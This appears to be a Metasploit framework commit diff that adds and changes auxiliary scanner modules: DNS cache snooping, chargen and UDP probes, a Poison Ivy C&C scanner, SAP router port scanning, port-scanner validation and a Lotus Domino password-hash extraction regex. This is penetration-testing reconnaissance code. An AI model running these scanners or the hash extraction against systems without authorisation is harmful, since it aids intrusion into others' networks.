def scrape_dns(domain)
# dns request with recursive disabled
use_tcp = datastore['TCP_DNS']
res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp)
use_tcp ? res.tcp_timeout = datastore['DNS_TIMEOUT'] : res.udp_timeout = datastore['DNS_TIMEOUT']
# query dns
begin
query = res.send(domain)
rescue ResolverArgumentError
print_error("Invalid domain: #{domain}")
return
rescue NoResponseError
print_error("DNS Timeout Issue: #{domain}")
return
end
# found or not found
if query.answer.empty?
vprint_status("#{domain} - Not Found")
return
end
@is_vulnerable = true
print_good("#{domain} - Found")
report_goods(domain)
end
# method to read each line from file
def read_file
::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line|
scrape_dns(line.chomp)
end
end
# log results to database
def report_goods(domain)
if datastore['TCP_DNS']
proto = "tcp"
else
proto = "udp"
end
report_note(
:host => datastore['NS'],
:name => "dns",
:port => 53,
:proto => proto,
:type => "dns.cache.scrape",
:data => "#{domain} cached",
:update => :unique_data
)
end
# main control method
def run
@is_vulnerable = false
print_status("Making queries against #{datastore['NS']}")
if datastore['DOMAIN'].blank?
read_file
else
scrape_dns(datastore['DOMAIN'])
end
report_vuln(
:host => datastore['NS'],
:name => "DNS Cache Snooping",
) if @is_vulnerable
end
end

68
modules/auxiliary/scanner/chargen/chargen_probe.rb Normal file
View File

@ -0,0 +1,68 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Udp
def initialize
super(
'Name' => 'Chargen Probe Utility',
'Description' => %q{
Chargen is a debugging and measurement tool and a character
generator service. A character generator service simply sends
data without regard to the input.
Chargen is susceptible to spoofing the source of transmissions
as well as use in a reflection attack vector. The misuse of the
testing features of the Chargen service may allow attackers to
craft malicious network payloads and reflect them by spoofing
the transmission source to effectively direct it to a target.
This can result in traffic loops and service degradation with
large amounts of network traffic.
},
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
],
'DisclosureDate' => 'Feb 08 1996')
register_options([
Opt::RPORT(19)
])
deregister_options('RHOST')
end
def run_host(rhost)
begin
connect_udp
pkt = Rex::Text.rand_text_alpha_lower(1)
udp_sock.write(pkt)
r = udp_sock.recvfrom(65535, 0.1)
if r and r[1]
vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}")
res = r[0].to_s.strip
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length)
end
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
nil
ensure
disconnect_udp if self.udp_sock
end
end
end

18
modules/auxiliary/scanner/discovery/udp_probe.rb
View File

@ -46,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary
@probes << 'probe_pkt_citrix'
@probes << 'probe_pkt_pca_st'
@probes << 'probe_pkt_pca_nq'
@probes << 'probe_chargen'
end
@ -204,6 +205,11 @@ class Metasploit3 < Msf::Auxiliary
case pkt[2]
when 19
app = 'chargen'
return unless chargen_parse(pkt[0])
@results[hkey] = true
when 53
app = 'DNS'
ver = nil
@ -362,6 +368,13 @@ class Metasploit3 < Msf::Auxiliary
"#{res[2]}_#{res[1]}"
end
#
# Validate a chargen packet.
#
def chargen_parse(data)
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
end
#
# Validate this is truly Citrix ICA; returns true or false.
#
@ -397,6 +410,11 @@ class Metasploit3 < Msf::Auxiliary
# The probe definitions
#
def probe_chargen(ip)
pkt = Rex::Text.rand_text_alpha_lower(1)
return [pkt, 19]
end
def probe_pkt_dns(ip)
data = [rand(0xffff)].pack('n') +
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+

19
modules/auxiliary/scanner/discovery/udp_sweep.rb
View File

@ -41,6 +41,7 @@ class Metasploit3 < Msf::Auxiliary
@probes << 'probe_pkt_citrix'
@probes << 'probe_pkt_pca_st'
@probes << 'probe_pkt_pca_nq'
@probes << 'probe_chargen'
end
def setup
@ -153,6 +154,12 @@ class Metasploit3 < Msf::Auxiliary
case sport
when 19
app = 'chargen'
ver = nil
return unless chargen_parse(data)
@results[hkey] = true
when 53
app = 'DNS'
ver = nil
@ -306,6 +313,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})")
end
#
# Validate a chargen packet.
#
def chargen_parse(data)
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
end
#
# Parse a db2disco packet.
#
@ -349,6 +363,11 @@ class Metasploit3 < Msf::Auxiliary
# The probe definitions
#
def probe_chargen(ip)
pkt = Rex::Text.rand_text_alpha_lower(1)
return [pkt, 19]
end
def probe_pkt_dns(ip)
data = [rand(0xffff)].pack('n') +
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+

4
modules/auxiliary/scanner/http/squid_pivot_scanning.rb
View File

@ -56,6 +56,10 @@ class Metasploit3 < Msf::Auxiliary
dead = false
portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
if portlist.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
vprint_status("[#{rhost}] Verifying manual testing is not required...")
manual = false

2
modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
View File

@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.body)
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
pass_hash = res.body.scan(/<INPUT NAME=\"\$?dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
if short_name.to_s.strip.empty?
short_name = 'NULL'

101
modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb Normal file
View File

@ -0,0 +1,101 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Poison Ivy Command and Control Scanner',
'Description' => %q{
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
},
'References' =>
[
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
],
'Author' => ['SeawolfRN'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]),
OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]),
OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10])
], self.class)
deregister_options('RPORT')
end
def run_host(ip)
timeout = datastore['TIMEOUT'].to_i
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
while(ports.length > 0)
t = []
r = []
begin
1.upto(datastore['CONCURRENCY']) do
this_port = ports.shift
break if not this_port
t << framework.threads.spawn("Module(#{self.refname})-#{ip}:#{this_port}", false, this_port) do |port|
begin
s = connect(false,
{
'RPORT' => port,
'RHOST' => ip,
'ConnectTimeout' => (timeout / 1000.0)
}
)
r << [ip,port,"open",'Unknown']
s.puts("\x00"*0x100,0) #Send 0x100 zeros, wait for answer
data = s.get_once(0x100)
if data.length == 0x100
data = s.get_once(0x4)
if data == "\xD0\x15\x00\x00" #Signature for PIVY C&C
print_status("#{ip}:#{port} - C&C Server Found")
r << [ip,port,"open",'Poison Ivy C&C']
end
end
rescue ::Rex::ConnectionRefused
vprint_status("#{ip}:#{port} - TCP closed")
r << [ip,port,"closed",'']
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
rescue ::Rex::Post::Meterpreter::RequestError
raise $!
ensure
disconnect(s) rescue nil
end
end
end
t.each {|x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
end
r.each do |res|
report_service(:host => res[0], :port => res[1], :state => res[2], :name=> res[3])
end
end
end
end

3
modules/auxiliary/scanner/portscan/ack.rb
View File

@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

3
modules/auxiliary/scanner/portscan/ftpbounce.rb
View File

@ -43,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
datastore['RHOST'] = datastore['BOUNCEHOST']

3
modules/auxiliary/scanner/portscan/syn.rb
View File

@ -48,8 +48,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

3
modules/auxiliary/scanner/portscan/tcp.rb
View File

@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
while(ports.length > 0)

3
modules/auxiliary/scanner/portscan/xmas.rb
View File

@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
print_error("Error: No valid ports specified")
return
raise Msf::OptionValidateError.new(['PORTS'])
end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

4
modules/auxiliary/scanner/rdp/ms12_020_check.rb
View File

@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
],
'Author' =>
[
'Royce Davis @R3dy_ <rdavis[at]accuvant.com>',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>'
'Royce Davis "R3dy" <rdavis[at]accuvant.com>',
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
],
'License' => MSF_LICENSE
))

81
modules/auxiliary/scanner/sap/sap_router_portscanner.rb
View File

@ -9,7 +9,8 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
VALID_HOSTNAME_REGEX = /^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$/
def initialize
super(
@ -36,8 +37,9 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']),
OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']),
OptAddress.new('RHOST', [true, 'SAPRouter address', '']),
OptPort.new('RPORT', [true, 'SAPRouter TCP port', '3299']),
OptString.new('TARGETS', [true, 'Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.', '']),
OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]),
OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']),
OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']),
@ -47,10 +49,9 @@ class Metasploit3 < Msf::Auxiliary
# 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,
# 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]),
OptEnum.new('RESOLVE',[true,'Where to resolve TARGETS','local',['remote','local']])
], self.class)
deregister_options('RPORT')
end
# Converts a instance specification like "4,21-23,33" into a sorted,
@ -253,6 +254,14 @@ class Metasploit3 < Msf::Auxiliary
vprint_error("#{ip}:#{port} - invalid route")
when /reacheable/
vprint_error("#{ip}:#{port} - unreachable")
when /hostname '#{ip}' unknown/
vprint_error("#{ip}:#{port} - unknown host")
when /GetHostByName: '#{ip}' not found/
vprint_error("#{ip}:#{port} - unknown host")
when /connection to .* timed out/
vprint_error("#{ip}:#{port} - connection timed out")
when /partner .* not reached/
vprint_error("#{ip}:#{port} - host unreachable")
else
vprint_error("#{ip}:#{port} - unknown error message")
end
@ -266,11 +275,40 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
def validate(range)
hosts_list = range.split(",")
return false if hosts_list.nil? or hosts_list.empty?
hosts_list.each do |host|
unless Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX
return false
end
end
end
def run
if datastore['RESOLVE'] == 'remote'
range = datastore['TARGETS']
unless validate(range)
print_error("TARGETS must be a comma separated list of IP addresses or hostnames when RESOLVE is remote")
return
end
range.split(/,/).each do |host|
run_host(host)
end
else
# resolve IP or crack IP range
ip_list = Rex::Socket::RangeWalker.new(datastore['TARGETS'])
ip_list.each do |ip|
run_host(ip)
end
end
end
def run_host(ip)
sap_host = datastore['SAPROUTER_HOST']
sap_port = datastore['SAPROUTER_PORT']
ports = datastore['PORTS']
# if port definition has NN then we require INSTANCES
@ -282,8 +320,7 @@ class Metasploit3 < Msf::Auxiliary
ports = build_sap_ports(ports)
if ports.empty?
print_error('Error: No valid ports specified')
return
raise Msf::OptionValidateError.new(['PORTS'])
end
print_status("Scanning #{ip}")
@ -301,15 +338,10 @@ class Metasploit3 < Msf::Auxiliary
begin
# create ni_packet to send to saprouter
routes = {sap_host => sap_port, ip => port}
routes = {rhost => rport, ip => port}
ni_packet = build_ni_packet(routes)
s = connect(false,
{
'RPORT' => sap_port,
'RHOST' => sap_host
}
)
s = connect(false)
s.write(ni_packet, ni_packet.length)
response = s.get()
@ -320,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::Rex::ConnectionRefused
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{sap_host}:#{sap_port} - Connection Refused")
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{rhost}:#{rport} - Connection Refused")
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
rescue ::Rex::Post::Meterpreter::RequestError
@ -354,10 +386,19 @@ class Metasploit3 < Msf::Auxiliary
r.each do |res|
tbl << [res[0], res[1], res[2], res[3]]
# we can't report if resolution is remote, since host is unknown locally
if datastore['RESOLVE'] == 'local'
begin
report_service(:host => res[0], :port => res[1], :state => res[2])
rescue ActiveRecord::RecordInvalid
# Probably raised because the Address is reserved, for example
# when trying to report a service on 127.0.0.1
print_warning("Can't report #{res[0]} as host to the database")
end
end
end
print_warning("Warning: Service info could be innacurated")
print_warning("Warning: Service info could be inaccurate")
print(tbl.to_s)
end

34
modules/auxiliary/scanner/sap/sap_service_discovery.rb
View File

@ -47,15 +47,20 @@ class Metasploit4 < Msf::Auxiliary
def_ports = [
'32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975',
'59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200',
'7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200',
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02',
'3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17',
'20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602',
'31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352',
'8353', '8366', '1090', '1095', '20201', '1099', '1089'
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '5NN15', '39NN', '4NN00',
'3NN01', '3NN02', '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08',
'3NN11', '3NN17'
]
static_ports = [
'21212', '21213', '59975', '59976', '4238', '4239','4240', '4241', '3299',
'3298', '515', '7200', '7210', '7269', '7270', '7575', '3909', '8200',
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '20003', '20004',
'20005', '20006', '20007', '31596', '31597', '31602', '31601', '31604',
'2000', '2001', '2002', '8355', '8357', '8351' ,'8352', '8353', '8366',
'1090', '1095', '20201', '1099', '1089'
]
ports = []
# Build ports array from valid instance numbers
@ -94,7 +99,7 @@ class Metasploit4 < Msf::Auxiliary
final_ports << dport.gsub("NN", inst)
end
end
final_ports.push(*static_ports)
ports = final_ports
if ports.empty?
@ -222,14 +227,15 @@ class Metasploit4 < Msf::Auxiliary
end
print_good("#{ip}:#{port}\t - #{service} OPEN")
=begin
report_note(:host => "#{ip}",
begin
report_note(
:host => "#{ip}",
:proto => 'TCP',
:port => "#{port}",
:type => 'SAP',
:data => "#{service}")
=end
:data => "#{service}"
)
end
r << [ip,port,"open", service]
rescue ::Rex::ConnectionRefused
vprint_status("#{ip}:#{port}\t - TCP closed")

2
modules/auxiliary/server/icmp_exfil.rb
View File

@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
# this is needed on windows cause we send interface directly to Pcap functions
@interface = get_interface_guid(@interface)
@iface_ip = datastore['LOCALIP']
@iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces
@iface_ip ||= get_ipv4_addr(@interface) if netifaces
raise "Interface IP is not defined and can not be guessed" unless @iface_ip
# start with blank slate

Some files were not shown because too many files have changed in this diff Show More